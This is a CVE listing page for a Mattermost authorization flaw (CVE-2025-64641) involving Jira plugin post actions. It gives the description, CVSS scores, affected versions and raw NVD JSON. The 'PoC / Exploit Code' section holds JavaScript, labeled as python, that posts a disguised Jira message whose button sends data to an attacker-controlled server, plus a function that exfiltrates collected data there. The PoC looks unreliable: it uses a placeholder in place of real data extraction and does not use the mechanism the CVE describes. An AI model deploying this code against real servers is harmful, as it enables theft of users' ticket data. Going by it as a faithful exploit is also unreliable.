Security Vulnerability Report
中文
CVE-2025-64641 CVSS 4.1 MEDIUM

CVE-2025-64641

Published: 2025-12-24 08:15:46
Last Modified: 2025-12-31 18:55:29
Source: [email protected]

Description

Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fail to verify that post actions invoking /share-issue-publicly were created by the Jira plugin which allowed a malicious Mattermost user to exfiltrate Jira tickets when victim users interacted with affected posts

CVSS Details

CVSS Score
4.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost 11.1.x <= 11.1.0
Mattermost 11.0.x <= 11.0.5
Mattermost 10.12.x <= 10.12.3
Mattermost 10.11.x <= 10.11.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64641 PoC - Malicious Post Action Injection // This PoC demonstrates how an attacker can exfiltrate Jira ticket data const axios = require('axios'); class MattermostJiraExploit { constructor(mattermostUrl, attackerToken, targetChannelId) { this.baseUrl = mattermostUrl; this.token = attackerToken; this.channelId = targetChannelId; this.attackerServer = 'https://attacker-controlled-server.com'; } async createMaliciousPost() { // Create a post with a malicious action that mimics Jira plugin behavior const maliciousPost = { channel_id: this.channelId, message: 'Jira Issue Update: Please review', props: { attachments: [{ pretext: 'Jira ticket has been shared with you', title: 'Project Security Issue', actions: [{ id: 'malicious-share-action', name: 'View Details', type: 'button', integration: { url: `${this.attackerServer}/collect`, // Exfiltration endpoint context: { action: 'share-issue-publicly', jira_ticket_data: '{{jira_ticket}}' // Placeholder for actual data } } }] }] } }; try { const response = await axios.post( `${this.baseUrl}/api/v4/posts`, maliciousPost, { headers: { 'Authorization': `Bearer ${this.token}`, 'Content-Type': 'application/json' } } ); console.log('Malicious post created:', response.data.id); return response.data.id; } catch (error) { console.error('Failed to create post:', error.message); } } async exfiltrateData(exfiltratedData) { // Send exfiltrated data to attacker's server await axios.post(`${this.attackerServer}/collect`, { cve: 'CVE-2025-64641', timestamp: new Date().toISOString(), data: exfiltratedData, source: 'mattermost_jira_integration' }); console.log('Data exfiltration successful'); } } // Usage example const exploit = new MattermostJiraExploit( 'https://mattermost.example.com', 'attacker_auth_token', 'target_channel_id' ); exploit.createMaliciousPost();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64641", "sourceIdentifier": "[email protected]", "published": "2025-12-24T08:15:46.487", "lastModified": "2025-12-31T18:55:29.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.1.x <= 11.1.0, 11.0.x <= 11.0.5, 10.12.x <= 10.12.3, 10.11.x <= 10.11.7 fail to verify that post actions invoking /share-issue-publicly were created by the Jira plugin which allowed a malicious Mattermost user to exfiltrate Jira tickets when victim users interacted with affected posts"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.8", "matchCriteriaId": "7B0477E2-8999-4E1D-9E6B-7A818CB76488"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.4", "matchCriteriaId": "B83EB4C3-5E75-4BD1-94F3-ED29D329E5C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.6", "matchCriteriaId": "B6EAC2A0-B481-45EA-90AE-F950921DB06A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.1", "matchCriteriaId": "387573EC-2596-4529-BD43-054E52D34EC0"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.